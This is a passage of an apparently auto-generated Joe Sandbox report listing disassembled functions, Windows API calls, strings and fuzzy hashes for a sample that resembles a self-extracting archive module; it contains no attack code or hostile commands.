                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: cfd591f57166502c3996eeb52ba497cf8e1c0d4e19f98a0caefb48489f851d59
                                                                                • Instruction ID: 571c065075a9a1381f58638ba6fca5ee0bdf2100e8ed77eb0067926671c236e0
                                                                                • Opcode Fuzzy Hash: cfd591f57166502c3996eeb52ba497cf8e1c0d4e19f98a0caefb48489f851d59
                                                                                • Instruction Fuzzy Hash: C3B012B07E234035FE684F204C0BFE729106344B5BF10806CB305E80C4EBD45440501D
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: malloc
                                                                                • String ID:
                                                                                • API String ID: 2803490479-0
                                                                                • Opcode ID: e711c72adcf938b8c65d85f746aed726eb56a957d15baed71f8ebda879dc1b73
                                                                                • Instruction ID: e2a553e11ccdc75bfd9e09a2a759721d75f2ab5807daf84bd34e7484f2f3f46e
                                                                                • Opcode Fuzzy Hash: e711c72adcf938b8c65d85f746aed726eb56a957d15baed71f8ebda879dc1b73
                                                                                • Instruction Fuzzy Hash: 47B012B011210106DE1C03343C040973150274070BBC049BDB402C0211FB2EC024500F
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: malloc
                                                                                • String ID:
                                                                                • API String ID: 2803490479-0
                                                                                • Opcode ID: 5141d728e474e7521a368291e8f18d83c3acb210d46f4bca5788423dd7cb6c14
                                                                                • Instruction ID: 93b00212a99b6a082cadc79a1e30e4f7e8762bb5dbef7d3919aab0975435a3d9
                                                                                • Opcode Fuzzy Hash: 5141d728e474e7521a368291e8f18d83c3acb210d46f4bca5788423dd7cb6c14
                                                                                • Instruction Fuzzy Hash: DCB012A890118102DA0403343C04093317277D070B7C4C8F9A401C0215FF3DC038600E
                                                                                APIs
                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,0041269C), ref: 00418EBC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 1263568516-0
                                                                                • Opcode ID: 98c2aa6179cb7425aeb67d4f545a5e2afc36e1fc0ccae7b31786c0746bb73036
                                                                                • Instruction ID: 0e3cf457c684582be7836cc479f2286583ff41d20b64db86ad3597c1f4fbeca2
                                                                                • Opcode Fuzzy Hash: 98c2aa6179cb7425aeb67d4f545a5e2afc36e1fc0ccae7b31786c0746bb73036
                                                                                • Instruction Fuzzy Hash: D2B0127074230022ED3807110D05B9716001700702F10801C3205A40C08B9DA404450C
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: free
                                                                                • String ID:
                                                                                • API String ID: 1294909896-0
                                                                                • Opcode ID: e67894145b99b58128abb99e60c4f0f8425ba21e255e0df04cc2fc7601b1b592
                                                                                • Instruction ID: 274342a45a8081fe27f7bdb5d6c884acc69a6842209db99ac87ec0640da087f0
                                                                                • Opcode Fuzzy Hash: e67894145b99b58128abb99e60c4f0f8425ba21e255e0df04cc2fc7601b1b592
                                                                                • Instruction Fuzzy Hash:
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: free
                                                                                • String ID:
                                                                                • API String ID: 1294909896-0
                                                                                • Opcode ID: e74c70c6999e5317b9509654f16dd5251969b965aacf69294b6ffea9f9e2b663
                                                                                • Instruction ID: 1f3b28ff6c5a90f3ca056b026900e47eaa4da2a5162f9c1f96bfe5ec7c3f15e6
                                                                                • Opcode Fuzzy Hash: e74c70c6999e5317b9509654f16dd5251969b965aacf69294b6ffea9f9e2b663
                                                                                • Instruction Fuzzy Hash:
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,0041BACC,?,0041E138,?,?,004066DE,?,00000000), ref: 004058D2
                                                                                • _wtol.MSVCRT ref: 004059A2
                                                                                • _wtol.MSVCRT ref: 004059BB
                                                                                  • Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C17
                                                                                  • Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C20
                                                                                  • Part of subcall function 00411BE5: memcpy.MSVCRT(?,00000000,?,?,?,?,00405076,?,00000000), ref: 00411C38
                                                                                  • Part of subcall function 00411CA3: memcpy.MSVCRT(?,00000000,00000002,00000000,?,?,00000000,004050A9,?,0041ADC8,?,?,?,00000000), ref: 00411CD0
                                                                                  • Part of subcall function 00403DC8: GetLastError.KERNEL32(?,?,00000000), ref: 00403E17
                                                                                  • Part of subcall function 00403DC8: wsprintfW.USER32 ref: 00403E28
                                                                                  • Part of subcall function 00403DC8: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00403E3D
                                                                                  • Part of subcall function 00403DC8: GetLastError.KERNEL32 ref: 00403E42
                                                                                  • Part of subcall function 00403DC8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00403E5D
                                                                                  • Part of subcall function 00403DC8: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00403E70
                                                                                  • Part of subcall function 00403DC8: GetLastError.KERNEL32 ref: 00403E77
                                                                                  • Part of subcall function 00403DC8: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00403E8C
                                                                                  • Part of subcall function 00403DC8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00403E9C
                                                                                  • Part of subcall function 00403DC8: SetLastError.KERNEL32(?), ref: 00403EC3
                                                                                  • Part of subcall function 00403DC8: lstrlenA.KERNEL32(0041B930), ref: 00403EF9
                                                                                  • Part of subcall function 00403DC8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00403F14
                                                                                  • Part of subcall function 00403DC8: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00403F46
                                                                                  • Part of subcall function 004056CB: _wtol.MSVCRT ref: 00405668
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$??2@_wtol$??3@EnvironmentVariablelstrcmpimemcpy$InfoLocalelstrlenwsprintf
                                                                                • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$PasswordText$PasswordTitle$Progress$Title$VolumeNameStyle$WarningTitle$\A
                                                                                • API String ID: 730802180-3281108388
                                                                                • Opcode ID: 4833a71524584f7b56f0bf71057d22a1d3a203c273a0d2e7db0efd1fbdcbf9ec
                                                                                • Instruction ID: b5e5bdf9c584833b01f0c934a091df39086854388a50827319ec31f510801f87
                                                                                • Opcode Fuzzy Hash: 4833a71524584f7b56f0bf71057d22a1d3a203c273a0d2e7db0efd1fbdcbf9ec
                                                                                • Instruction Fuzzy Hash: 68514DB5B01A0087FB18EB7799115AB66DADF84358704C43B9815E73D2FF3C89818E5D
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 00403E17
                                                                                • wsprintfW.USER32 ref: 00403E28
                                                                                • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00403E3D
                                                                                • GetLastError.KERNEL32 ref: 00403E42
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00403E5D
                                                                                • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00403E70
                                                                                • GetLastError.KERNEL32 ref: 00403E77
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 00403E8C
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00403E9C
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00403EBA
                                                                                • SetLastError.KERNEL32(?), ref: 00403EC3
                                                                                • lstrlenA.KERNEL32(0041B930), ref: 00403EF9
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00403F14
                                                                                • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00403F46
                                                                                • _wtol.MSVCRT ref: 00403F57
                                                                                • MultiByteToWideChar.KERNEL32(00000000,0041B930,00000001,00000000,00000002), ref: 00403F77
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                                • String ID: HA$SfxString%d
                                                                                • API String ID: 2117570002-4175495882
                                                                                • Opcode ID: bc30f0ea7da84d81cbdf466a9fb53cb914f331c4cfcb830f3d13f4ef1284af07
                                                                                • Instruction ID: 826b4a115549d6cfa4e8bf1551a429c7e3dac2c77e478b686eb9c33c06818d2c
                                                                                • Opcode Fuzzy Hash: bc30f0ea7da84d81cbdf466a9fb53cb914f331c4cfcb830f3d13f4ef1284af07
                                                                                • Instruction Fuzzy Hash: E0518F75A00205BFDB209F65DD499ABBBBCEF44301B10853BE906E6290E738AE54CB59
                                                                                APIs
                                                                                • _wtol.MSVCRT ref: 004048ED
                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,-0000001A,00000000), ref: 0040499D
                                                                                • _wtol.MSVCRT ref: 00404A56
                                                                                • CoCreateInstance.OLE32(0041C85C,00000000,00000001,0041C80C,?,.lnk,?,0000005C), ref: 00404AF4
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00404B8E
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00404B96
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00404B9E
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00404BA6
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00404BAE
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404BB6
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404BBE
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00404BC6
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?), ref: 00404BCE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                                • String ID: .lnk
                                                                                • API String ID: 408529070-24824748
                                                                                • Opcode ID: 8f4be62236c205874ad8fe4d42cfdaf836737bed6dde23ea050fd9b739d62d60
                                                                                • Instruction ID: 83a2d305c882314969b83a1368edb940d706b9a9cbb686142cff4198cf257129
                                                                                • Opcode Fuzzy Hash: 8f4be62236c205874ad8fe4d42cfdaf836737bed6dde23ea050fd9b739d62d60
                                                                                • Instruction Fuzzy Hash: 8891B375900109ABCF04EFA5CC959EEB779BF84304B60457EF502B71A1EB39AE85CB18
                                                                                APIs
                                                                                  • Part of subcall function 00416CB7: _CxxThrowException.MSVCRT(?,0041C9D4), ref: 00416CFF
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 00414372
                                                                                  • Part of subcall function 00414189: ??3@YAXPAX@Z.MSVCRT(?,00000000,00414388,?,00000000), ref: 0041418F
                                                                                  • Part of subcall function 00414189: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00414388,?,00000000), ref: 00414197
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000084,00000000,?,00000000), ref: 00414409
                                                                                • ??2@YAPAXI@Z.MSVCRT(?,?,00000000), ref: 00414616
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00414648
                                                                                • SysFreeString.OLEAUT32(?), ref: 00414651
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 0041475D
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00414765
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000030,?,00000000), ref: 004147AB
                                                                                • SysFreeString.OLEAUT32(?), ref: 004147EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$??2@$FreeString$ExceptionThrow
                                                                                • String ID:
                                                                                • API String ID: 3050852170-0
                                                                                • Opcode ID: 0dc503826e79d450dff9e6847ae3b1e9803551f045c19f6bbaade4de96a530dc
                                                                                • Instruction ID: 63c1d7170cb7f9ccbcc5f7ed3098d04a866bf1aea97f2543f5bdc1a1635b749d
                                                                                • Opcode Fuzzy Hash: 0dc503826e79d450dff9e6847ae3b1e9803551f045c19f6bbaade4de96a530dc
                                                                                • Instruction Fuzzy Hash: 82525671A00209DFCB14DF64C894AEE7BB5BF88318F25415AF8169B351DB39ED81CB98
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403A01
                                                                                • FindResourceExA.KERNEL32(00000000,?,?), ref: 00403A1F
                                                                                • FindResourceExA.KERNEL32(?,?,?,00000409), ref: 00403A36
                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 00403A49
                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00403A55
                                                                                • LockResource.KERNEL32(00000000), ref: 00403A60
                                                                                • GetProcAddress.KERNEL32(SetProcessPreferredUILanguages), ref: 00403A8C
                                                                                • wsprintfW.USER32 ref: 00403AA6
                                                                                • GetProcAddress.KERNEL32(SetThreadPreferredUILanguages), ref: 00403ABE
                                                                                Strings
                                                                                • SetThreadPreferredUILanguages, xrefs: 00403AB3
                                                                                • SetProcessPreferredUILanguages, xrefs: 00403A77
                                                                                • %04X%c%04X%c, xrefs: 00403AA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$AddressFindProc$HandleLoadLockModuleSizeofwsprintf
                                                                                • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages
                                                                                • API String ID: 2090077119-3413765421
                                                                                • Opcode ID: 8f248b3f3ccdae2e627c25948350bafec117c70763480a7fd32ce54566ccef8a
                                                                                • Instruction ID: ed0741534da578f5e66d3de38586fa322f1091544de9e69cad048277579e345e
                                                                                • Opcode Fuzzy Hash: 8f248b3f3ccdae2e627c25948350bafec117c70763480a7fd32ce54566ccef8a
                                                                                • Instruction Fuzzy Hash: C2214175A01308BBDB119FA5DD45BAE7FBCEB04701F108036FA40A22A1E7B59E50DB59
                                                                                APIs
                                                                                  • Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA
                                                                                  • Part of subcall function 00411CA3: memcpy.MSVCRT(?,00000000,00000002,00000000,?,?,00000000,004050A9,?,0041ADC8,?,?,?,00000000), ref: 00411CD0
                                                                                • FindFirstFileW.KERNEL32(?,?,0041ABCC,?,00000000,?,00000000), ref: 0040343D
                                                                                • lstrcmpW.KERNEL32(?,0041ABC8,?,0000005C,?), ref: 00403492
                                                                                • lstrcmpW.KERNEL32(?,0041ABC0), ref: 004034A4
                                                                                • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?), ref: 004034B9
                                                                                • DeleteFileW.KERNEL32(?), ref: 004034C2
                                                                                • FindNextFileW.KERNEL32(?,00000010), ref: 004034D6
                                                                                • FindClose.KERNEL32(?), ref: 004034E7
                                                                                • SetCurrentDirectoryW.KERNEL32 ref: 004034F3
                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 004034FC
                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 00403503
                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403510
                                                                                  • Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C17
                                                                                  • Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C20
                                                                                  • Part of subcall function 00411BE5: memcpy.MSVCRT(?,00000000,?,?,?,?,00405076,?,00000000), ref: 00411C38
                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040351D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
